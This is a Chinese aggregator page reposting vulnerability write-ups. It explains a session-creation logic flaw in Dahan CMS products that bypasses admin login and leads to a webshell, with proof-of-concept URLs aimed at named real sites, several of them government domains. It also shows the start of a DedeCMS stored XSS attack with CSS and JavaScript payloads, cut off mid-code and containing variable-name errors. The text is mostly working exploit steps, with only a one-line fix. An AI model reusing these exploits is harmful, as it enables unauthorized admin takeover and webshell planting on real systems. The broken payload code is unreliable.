首页 > 范文大全

大汉网络0day通杀所有系统和版本

时间：2024年04月08日

来源：雪松

编辑：本站小编

收藏本文

下载本文

下面小编给大家整理了大汉网络0day通杀所有系统和版本，本文共4篇，供大家阅读参考。本文原稿由网友“雪松”提供。

篇1：大汉网络0day通杀所有系统和版本

管理后台权限绕过，进入后台后轻松GetShell，

经验证通杀所有系统和版本，包括：jcms，jact，jsearch，vipchat，vc，xxgk等等，

我估计这是大汉影响范围最大的漏洞了。求加精！

Setup目录Session权限绕过：

代码分析 /jcms/setup/opr_licenceinfo.jsp ： //获取Session中cookie_username的值，赋值给strUser String strUser = (String)sessions.getAttribute(“cookie_username”); // 判断strUser值是否为空？ if( strUser == null || strUser.trim.length() == 0 ) { out.println('请先登录!') return; } //如果为空，则未登录，直接返回// 如果不为空，说明已经登录

逆向java servlet 的代码 /VerifyCodeServlet

// 获取请求参数 var，赋值给 strVar String strVar = Convert.getParameter(request, “var”, “”); if(strVar == null){ request.getSession().setAttribute(“COMPLAT”, str_code); // 将随机码保存到SESSION中 }else{ // 如果 strVar 不为空的话，创建 strVar 为名称的 SESSION 值 request.getSession().setAttribute(strVar, str_code); // 将随机码保存到SESSION中 }所以通过参数 var，就可以控制SESSION的名称的创建

通过两个程序的分析，整理一下：

1. opr_licenceinfo.jsp需要一个SESSION cookie_username 不为空，就可以成功登录

2. /VerifyCodeServlet 可以创建任意 SESSION的key值

所以两者配合，就可以构造成功登录了。

直接访问opr_licenceinfo.jsp 需要登录

www.zgzhijiang.gov.cn/jcms/setup/opr_licenceinfo.jsp

添加一个Session值 cookie_username

www.zgzhijiang.gov.cn/jcms/VerifyCodeServlet?var=cookie_username

然后再次访问/jcms/setup/opr_licenceinfo.jsp，成功登录，

Licence文件上传webshell漏洞，不演示了，参考：wooyun.org/bugs/wooyun--052699

vipchat 的 POC：

sdds.gov.cn/vipchat/setup/

sdds.gov.cn/vipchat/VerifyCodeServlet?var=cookie_username

sdds.gov.cn/vipchat/setup/admin.jsp

jsearch 的 POC：

www.hyhjbh.com/jsearch/setup/

www.hyhjbh.com/jsearch/VerifyCodeServlet?var=cookie_username

www.hyhjbh.com/jsearch/setup/opr_licenceinfo.jsp

其他的大汉系统，就不一一罗列了，

这算是一个VerifyCodeServlet组件的逻辑漏洞吧，

大汉的所有系统都包含VerifyCodeServlet这个组件，用于生成验证码，

所以导致了所有系统的通杀，影响范围非常广了。

注意：

1. 有一些站点，访问setup目录，返回403，禁止了访问。

2. 大汉新版，不影响。

解决方案：

修复VerifyCodeServlet组件的逻辑。

篇2：DEDECMS xss 0day 通杀所有版本漏洞预警

漏洞原因：由于编辑器过滤不严，将导致恶意脚本运行，可getshell

目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。

下面说说利用方法。

条件有2个：

1.开启注册

2.开启投稿

注册会员—-发表文章

内容填写：

新建xss.css,内容:

body{

background-image:url(´javascript.:document.write(“”)´)

}

新建xss.js文件,内容:

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

if(request.overrideMimeType) {

request.overrideMimeType(´text/xml´);

}

} else if(window.ActiveXObject) {

var versions = [´Microsoft.XMLHTTP´, ´MSXML.XMLHTTP´, ´Microsoft.XMLHTTP´, ´Msxml2.XMLHTTP.7.0´,´Msxml2.XMLHTTP.6.0´,´Msxml2.XMLHTTP.5.0´, ´Msxml2.XMLHTTP.4.0´, ´MSXML2.XMLHTTP.3.0´, ´MSXML2.XMLHTTP´];

for(var i=0; i

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

xmlhttp=request;

function getFolder( url ){

bj = url.split(´/´)

return obj[obj.length-2]

}

Url = top.location.href;

u = getFolder(oUrl);